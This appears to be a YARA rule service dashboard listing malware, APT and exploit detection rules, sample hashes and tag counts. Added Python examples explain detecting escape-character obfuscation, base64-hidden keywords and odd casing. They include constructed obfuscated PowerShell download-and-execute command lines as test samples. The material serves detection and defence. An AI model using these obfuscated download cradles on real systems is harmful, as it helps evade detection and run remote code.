currently serving 8613 rules

New YARA Rules per Day (chart)

Newest YARA Rules

| Rule | Description | Date |
|---|---|---|
| APT_CN_Loader_May19_1 | Detects Chinese APT group Loader v1 | 24.05.2019 |
| APT_CN_NET_Loader_May19_1 | Detects Chinese APT group .NET Loader | 24.05.2019 |
| APT_CN_RAR_Dropper_May19_1 | Detects RAR Dropper used by Chinese APT group in March 2019 | 24.05.2019 |
| APT_MAL_AridViper_Samples_Gen_May19_1 | Detects AridViper samples | 24.05.2019 |
| SUSP_Doc_Dropper_Strings_May91_1 | Detects strings used in malicious dropper docs | 24.05.2019 |
| SUSP_NTDS_SYSTEM_Theft | Detects a copy of the NTDS.dit or SYSTEM file | 24.05.2019 |
| SUSP_PS_GetEnv_Startup | Detects suspicious PowerShell script that tries to get the location of the Startup folder | 24.05.2019 |
| SUSP_JS_Invoke_BAT_May19_1 | Detects suspicious JavaScript file that invokes a Windows batch file | 24.05.2019 |
| SUSP_BOT_Path_May19_1 | Detects suspicious reference to a directory named Bot | 24.05.2019 |
| MAL_ME_NET_Malware_May19_1 | Detects unknown .NET malware noticed in May 2019 | 24.05.2019 |
| MAL_CobaltStrike_inMemory_Rule | Detects CobaltStrike strings in memory | 24.05.2019 |
| MAL_Unknown_Malware_May19_1 | Detects unspecified malware noticed in 2019 | 23.05.2019 |
| EXPL_Win10_0day_May19_2 | Detects tool that exploits Win 10 Schtask Job 0day | 22.05.2019 |
| SUSP_EXPL_Win10_0day_May19_2 | Detects code that contains commands that look like a Win10 0day | 22.05.2019 |
| APT_APT28_Strings_May19_1 | Detects strings from the Sofacy / APT28 article published by ESET in May 2019 | 22.05.2019 |
| REG_APT28_Backdoor_May19_1 | Detects APT28 backdoor strings in the registry | 22.05.2019 |
| REG_APT10_RUN_Key_May19_1 | Detects APT10 backdoor strings in the registry | 22.05.2019 |
| Gen_AridViper_Malware_Dec17 | Detects AridViper related malware spotted in December 2017 | 22.05.2019 |
| SUSP_PDF_JS_Action | Detects suspicious JavaScript in PDF | 22.05.2019 |
| SUSP_Obfuscation_IEX_PS1_May19_1 | Detects suspicious IEX backtick obfuscation | 22.05.2019 |
| SUSP_Impacket_Sample_May19_1 | Detects suspicious samples that embed the Impacket library | 22.05.2019 |
| MAL_PDF_JS_Templ_Dropper_May19_1 | Detects suspicious JavaScript in PDF that looks like a script used in droppers noticed in May 2019 | 22.05.2019 |
| MAL_Unknown_Pass_Stealer_May19_3 | dropzone - file ab3755d71bb677e4bd5684493f2a61912c6fea904aa7f78c18253778b9256fd4 | 22.05.2019 |
| MAL_Unknown_Pass_Stealer_May19_2 | Detects unknown password stealer | 22.05.2019 |
| MAL_Unknown_Pass_Stealer_May19_1 | Detects unknown password stealer | 22.05.2019 |
| HKTL_ConsoleSniffer_May19_1 | Detects unknown Console Sniffer tool | 21.05.2019 |
| APT_MAL_CS_OceanLotus_May19_1 | Detects OceanLotus malware in source code form | 21.05.2019 |
| APT_MAL_BAT_OceanLotus_May19_1 | Detects OceanLotus helper batch file | 21.05.2019 |
| APT_MAL_Doc_OceanLotus_Dropper_May19_1 | Detects OceanLotus dropper noticed in May 2019 | 21.05.2019 |
| SUSP_Encoded_Assembly_Load | Detects the keyword Assembly.Load in encoded form | 21.05.2019 |
| SUSP_MsBuild_AppData_Folder_Target | Detects suspicious MSBuild config file pointing to an AppData Temp folder | 21.05.2019 |
| SUSP_OBFUSC_Caret_May19_1 | Detects obfuscation techniques found in slides by Daniel Bohannon | 21.05.2019 |
| SUSP_OBFUSC_Strings_DB_May19_1 | Detects obfuscation techniques found in slides by Daniel Bohannon in May 2019 | 21.05.2019 |
| MAL_NanoCore_RAT_May19_1 | Detects NanoCore RAT | 21.05.2019 |
| MAL_RANSOM_MegaCortex_May19_1 | Detects MegaCortex Ransomware | 21.05.2019 |
| MAL_RANSOM_MegaCortex_May19_2 | Detects MegaCortex Ransomware | 21.05.2019 |
| EXPL_RDP_CVE_2019_0708 | Detects exploit code for the RDP vulnerability CVE-2019-0708 | 20.05.2019 |
| SUSP_RDP_Payload | Detects suspicious payloads (initial PDU) used in rare RDP tools and exploits | 20.05.2019 |
| SUSP_MetaSploit_Indicator_Inject | Detects suspicious Metasploit string indicator | 20.05.2019 |
| SUSP_CobaltStrike_DB_File | Detects suspicious CobaltStrike DB file noticed in May 2019 | 20.05.2019 |
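Two rows above, SUSP_Obfuscation_IEX_PS1_May19_1 and SUSP_OBFUSC_Caret_May19_1, cover escape-character obfuscation: PowerShell drops a backtick placed in front of an ordinary letter inside a bare word (IE`X runs as IEX), and cmd.exe does the same with the caret (p^o^w^e^r^s^h^e^l^l). The Python below is an added example of how a detector can count such in-word escapes and strip them to recover the keyword; it is written for this page and is not Valhalla's rule logic. The keyword list, the threshold and the sample command lines are constructed assumptions.

```python
"""Escape-character obfuscation check: in-word backticks (PowerShell) and carets
(cmd.exe). Added example for this page; not Valhalla's rule logic. Keyword list,
threshold and sample command lines are constructed assumptions."""
import re

# Shell -> regex for an escape character wedged between two word characters.
# Such an escape changes nothing for the interpreter and exists only to break
# literal-string signatures.
_IN_WORD_ESCAPE = {
    "powershell": re.compile(r"(?<=\w)`(?=\w)"),
    "cmd": re.compile(r"(?<=\w)\^(?=\w)"),
}

# Assumed keywords worth recovering; a real rule set carries its own list.
KEYWORDS = ("Invoke-Expression", "IEX", "DownloadString", "New-Object")


def count_in_word_escapes(cmdline: str, shell: str) -> int:
    """Number of escape characters that sit inside a word."""
    return len(_IN_WORD_ESCAPE[shell].findall(cmdline))


def normalize(cmdline: str, shell: str) -> str:
    """Remove in-word escapes so the original token reappears (IE`X -> IEX)."""
    return _IN_WORD_ESCAPE[shell].sub("", cmdline)


def suspicious_escapes(cmdline: str, shell: str, keywords=KEYWORDS,
                       threshold: int = 2) -> list:
    """Keywords that become visible once in-word escapes are stripped.

    Requires at least `threshold` in-word escapes so that a single one, which
    may be a genuine escape sequence such as `n in a bare word, does not trip
    the check on its own.
    """
    if count_in_word_escapes(cmdline, shell) < threshold:
        return []
    plain = normalize(cmdline, shell).lower()
    return [kw for kw in keywords if kw.lower() in plain]


# Constructed samples (not real incident data).
SAMPLE_PS = "IE`X (Ne`w-Object Net.WebClient).Down`loadString($u)"
SAMPLE_CMD = "c^m^d /c p^o^w^e^r^s^h^e^l^l -nop -w hidden"

if __name__ == "__main__":
    print(normalize(SAMPLE_PS, "powershell"))
    print(suspicious_escapes(SAMPLE_PS, "powershell"))
    print(normalize(SAMPLE_CMD, "cmd"))
    print(suspicious_escapes(SAMPLE_CMD, "cmd", ("powershell",)))
```

The stripping is a normalization for matching, not an interpreter: a backtick before n, t, r, 0, a, b, f, v or u (and e in newer PowerShell) forms an escape sequence rather than the bare letter, which is exactly why obfuscation tools avoid those positions. YARA's regex engine has no lookarounds, so a rule would express the same idea with fixed alternations (I`E`X, IE`X, and so on) rather than the regex used here.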

Successful YARA Rules in Set

| Rule | Average AV Detection Rate (AV engines per sample) | Sample Count |
|---|---|---|
| APT_MuddyWater_CS_CmdLine_Sep18_1 | 0.0 | 19 |
| SUSP_MsBuild_AppData_Folder_Target | 0.0 | 34 |
| SUSP_Base64_Encoded_E_IEX | 0.67 | 275 |
| HKTL_DNSCrypt_Proxy | 0.82 | 11 |
| MAL_APT_Gamaredon_BAT_Apr19_1 | 1.25 | 12 |
| SUSP_SwearWord_in_Code | 1.83 | 12 |
| SUSP_Encoded_IEX_2 | 2.02 | 99 |
| SUSP_Encoded_NewObject_NetWebclient | 2.95 | 119 |
| SUSP_RevShell_CmdLine_Code | 3.19 | 16 |
| SUSP_PS_Base64_CWB_String | 3.38 | 16 |
| HKTL_Koadic_XLS_Template | 3.76 | 25 |
| SUSP_CryptoObfuscator | 4.5 | 16 |
| SUSP_LNX_suspicious_strings_hacking_Dec18 | 5.55 | 11 |
| Casing_Anomaly_FromBase64String | 5.57 | 21 |
| SUSP_Base64_Encoded_Hex_Encoded_Code | 5.67 | 33 |
| SUSP_Obfuscated_VBS_Feb19_1 | 6.0 | 12 |
| SUSP_Script_Py_SingleLiner_B64 | 6.5 | 18 |
| SUSP_Python_OneLiner_Feb19_1 | 6.81 | 31 |
| EXP_CVE_2018_14442 | 7.47 | 34 |
| Casing_Anomaly_Convert_PS | 7.7 | 27 |
| SUSP_ELF_LNX_UPX_Compressed_File | 8.16 | 115 |
| MAL_NET_MeterPreter_Payload_1 | 8.3 | 23 |
| SUSP_Encoded_PS_DownloadString | 10.0 | 14 |
| SUSP_PHP_Obfuscation_GZ_Base64 | 10.42 | 12 |
| SUSP_Obfuscation_ChrW_Feb19_1 | 11.64 | 47 |
| SUSP_Env_Var_Obfuscation | 11.82 | 44 |
| Casing_Anomaly_NewObject | 11.87 | 31 |
| SUSP_Base64_Encoded_Automation_AmsiUtils | 12.27 | 15 |
| Casing_Anomaly_PowerShell | 12.48 | 282 |
| EXPL_PDF_CVE_2018_4990_Mal_JPEG_Stream | 13.56 | 18 |
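Two rule families dominate this table: SUSP_Base64_Encoded_* / SUSP_Encoded_* rules, which look for a keyword hidden inside a base64 blob, and Casing_Anomaly_* rules, which look for a keyword typed in a casing nobody uses by hand. The Python below is an added example that shows the idea behind both; it is not Valhalla's rule code and the exact strings those rules carry are not published here. A keyword starting at byte offset 0, 1 or 2 of a 3-byte base64 group yields three different encodings, and only the characters whose six bits come entirely from keyword bytes are stable, so the function trims the rest and emits the three substrings a YARA rule would carry as literals. The keyword list, the accepted casings and the sample command line are constructed assumptions.

```python
"""Constructed demonstration of two detection ideas behind rule families listed
on this page: keywords hidden inside base64 blobs (SUSP_Base64_Encoded_*,
SUSP_Encoded_*) and keywords typed with unusual casing (Casing_Anomaly_*).
Added example code, not Valhalla's own rule logic; the keyword list, the
accepted casings and the sample command line are assumptions."""
import base64
import re

# Keywords whose encoded forms we look for. Assumed list; the real rule set
# uses its own strings.
KEYWORDS = ("IEX", "Invoke-Expression", "DownloadString", "Assembly.Load",
            "WriteProcessMemory", "GetCurrentThreadId")

# Leading base64 characters that depend on the (unknown) byte(s) preceding the
# keyword when it starts at byte offset 0, 1 or 2 of a 3-byte group.
_LEAD = (0, 2, 3)


def base64_keyword_variants(keyword: bytes) -> list:
    """Base64 substrings that contain `keyword` at each of the three alignments.

    Characters whose 6 bits mix keyword bytes with neighbouring bytes are cut
    off at both ends, so each substring matches regardless of what surrounds
    the keyword in the original plaintext.
    """
    variants = []
    for prefix_len in range(3):
        enc = base64.b64encode(b"\x00" * prefix_len + keyword).decode().rstrip("=")
        total = prefix_len + len(keyword)
        # Full 3-byte groups yield 4 fixed chars; a 1- or 2-byte tail fixes 1 or 2 more.
        end = (total // 3) * 4 + (total % 3)
        variants.append(enc[_LEAD[prefix_len]:end])
    return variants


def find_encoded_keywords(data: str, keywords=KEYWORDS,
                          encodings=("ascii", "utf-16le")) -> set:
    """Return {(keyword, encoding)} for every keyword whose base64 form occurs in `data`.

    UTF-16LE matters because `powershell -EncodedCommand` takes the base64 of
    UTF-16LE text, so patterns derived from ASCII alone would miss it.
    """
    hits = set()
    for kw in keywords:
        for enc in encodings:
            for variant in base64_keyword_variants(kw.encode(enc)):
                if variant in data:
                    hits.add((kw, enc))
                    break
    return hits


def casing_anomalies(text: str, canonical: str) -> list:
    """Occurrences of `canonical` (matched case-insensitively) written in a casing
    that is neither the canonical spelling nor all-lower, all-upper or
    first-letter-upper. Those four are the assumed 'normal' casings; anything
    else (e.g. pOwErShElL) is the evasion the Casing_Anomaly_* rules target."""
    accepted = {canonical, canonical.lower(), canonical.upper(), canonical.capitalize()}
    return [m.group(0)
            for m in re.finditer(re.escape(canonical), text, re.IGNORECASE)
            if m.group(0) not in accepted]


# Constructed sample: an obfuscated PowerShell launcher carrying a UTF-16LE
# base64 payload (no real indicator, $u stands in for a download URL).
_PAYLOAD = '$c=New-Object Net.WebClient;IEX $c.DownloadString($u)'
SAMPLE_CMDLINE = ("pOwErShElL -nop -w hidden -EncodedCommand "
                  + base64.b64encode(_PAYLOAD.encode("utf-16le")).decode())


def analyse(cmdline: str) -> dict:
    """Run both checks over one command line and report the findings."""
    return {
        "encoded_keywords": find_encoded_keywords(cmdline),
        "casing_anomalies": casing_anomalies(cmdline, "PowerShell"),
    }


if __name__ == "__main__":
    print(base64_keyword_variants(b"IEX"))
    for name, result in analyse(SAMPLE_CMDLINE).items():
        print(name, sorted(result) if isinstance(result, set) else result)
```

A three-letter keyword such as IEX produces base64 fragments of only three or four characters (SUVY, lFW, JRV), which will also occur by chance in unrelated base64 data; rules built on short keywords therefore need companion strings or a size condition, which is one reason the longer keywords in this table sit alongside the short ones.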

Latest Matches with Low AV Detection Rate

| Rule | AVs | SHA-256 |
|---|---|---|
| APT_MAL_BronzeUnion_CN_Mal_Cert | 1 | 3222b6855d195528c3ee39b0cc25d40664af3dbc09c6bbb1a5b0b9368d997deb |
| SUSP_Obfuscated_VBS_Feb19_1 | 6 | 1c2fc84bd09b03f55f083e63677704fcede033203ec71cbc050368869d428c96 |
| SUSP_Encoded_WriteProcessMemory | 6 | 1c2fc84bd09b03f55f083e63677704fcede033203ec71cbc050368869d428c96 |
| SUSP_Encoded_GetCurrentThreadId | 6 | 1c2fc84bd09b03f55f083e63677704fcede033203ec71cbc050368869d428c96 |
| SUSP_Base64_Cmd_Exe | 1 | a83c95ec56434d90f647fb64d14decb5d1be59f2926e10517d3459e6c3cf0da1 |
| SUSP_Obfuscated_VBS_Feb19_1 | 6 | 6e48e6811f2e0fa0601f82780cd5e61bd970ca094d255a43cb617628bdd5e8f6 |
| SUSP_Base64_Encoded_GetEnvironmentVariable | 6 | 6e48e6811f2e0fa0601f82780cd5e61bd970ca094d255a43cb617628bdd5e8f6 |
| SUSP_MZ_DefaultStub_in_Encoded_Form | 6 | 6e48e6811f2e0fa0601f82780cd5e61bd970ca094d255a43cb617628bdd5e8f6 |
| SUSP_VBA_Project_Keyword_Feb19_1 | 5 | 09ca983edc598ee0ce456361473da86d2faa7090b8ffaa8f5d23eb33615a8d38 |
| APT_MAL_BronzeUnion_CN_Mal_Cert | 2 | 34c7db184231535974ceff908267c1bdf272742efaa351d4e08dff12646bfd88 |
| SUSP_ShellCode_Variable | 11 | d76b658722f901729724f53889beb298c0a4b001097cdf99bdd9b4da1fcc14a5 |
| APT_MAL_BronzeUnion_CN_Mal_Cert | 2 | 48e888ed552ad598f59be365d3f6fa31fdbf79c52962365a6e96b6711a2120d7 |
| APT_MAL_BronzeUnion_CN_Mal_Cert | 2 | a4aaae1f7f447072f4b52a6b785c9a58c7311bead3a2b21c512a25f8f7de2210 |
| APT_MAL_BronzeUnion_CN_Mal_Cert | 2 | 9048d7367de572781bbee871fea34b185f7e1855eab215ee606690c25f35c0b2 |
| SUSP_ConfuserEx_Obfuscated_Gen | 13 | fad77ac94f0ffd4fc6a783b7523532d404fa925b17ef41c4f9b5213b8b7522b1 |
| SUSP_Impacket_Sample_May19_1 | 1 | f865936fd01456b28dd577ec6e1d531f1f87a4bff6a3e5dd1127d98f054acab1 |
| Ebowla_Golang_EXE_Supicious_1 | 1 | 493db8c66cfeda0a2ef45491a1310a153eb05cc6c3cf13d58bb04b355eeb9347 |
| EXP_CVE_2018_14442 | 5 | ebda6c801c21dfa4d286967ecedd3806d92700267cbcadaff0a61a05ba7829d8 |
| SUSP_CryptoObfuscator | 8 | 86a78fd81512bb2defad680c5374d8608c18e0c209607c04934d5cbb33814440 |
| SUSP_ConfuserEx_Obfuscated_Gen | 10 | dcd90bbe4be1036f476419924a5feb4906bc16e634b7af746078345bdc9be5e8 |

Top Tags in YARA Rule Set

| Tag (T-numbers are MITRE ATT&CK technique IDs) | Count |
|---|---|
| FILE | 5507 |
| EXE | 3975 |
| DEMO | 2402 |
| MAL | 2363 |
| APT | 2339 |
| HKTL | 2235 |
| T1100 | 1788 |
| WEBSHELL | 1766 |
| CHINA | 976 |
| SUSP | 945 |
| SCRIPT | 574 |
| RUSSIA | 367 |
| T1064 | 306 |
| MIDDLE_EAST | 298 |
| GEN | 298 |
| T1086 | 292 |
| T1112 | 276 |
| T1003 | 255 |
| REG | 242 |
| T1027 | 237 |
| T1193 | 197 |
| T1203 | 197 |
| T1075 | 190 |
| T1085 | 141 |
| T1178 | 134 |
| T1097 | 134 |
| T1050 | 131 |
| T1132 | 130 |
| EXPLOIT | 129 |
| OBFUS | 121 |